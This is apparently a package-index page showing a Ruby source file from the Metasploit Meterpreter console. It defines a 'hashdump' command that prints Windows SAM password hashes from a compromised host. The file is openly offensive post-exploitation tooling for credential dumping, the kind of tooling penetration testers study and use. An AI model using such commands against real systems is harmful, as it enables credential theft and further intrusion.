Sha256: 4f5f8392e81a4ef113f15d27732fd5de0b03260c55f7d0ddb3e760074a00df9e
Contents?: true
Size: 693 Bytes
Versions: 43
Compression:
Stored size: 693 Bytes
Contents
require 'rex/post/meterpreter' module Rex module Post module Meterpreter module Ui ### # # The password database portion of the privilege escalation extension. # ### class Console::CommandDispatcher::Priv::Passwd Klass = Console::CommandDispatcher::Priv::Passwd include Console::CommandDispatcher # # List of supported commands. # def commands { "hashdump" => "Dumps the contents of the SAM database" } end # # Name for this dispatcher. # def name "Priv: Password database" end # # Displays the contents of the SAM database # def cmd_hashdump(*args) client.priv.sam_hashes.each { |user| print_line("#{user}") } return true end end end end end end
Version data entries
43 entries across 43 versions & 1 rubygems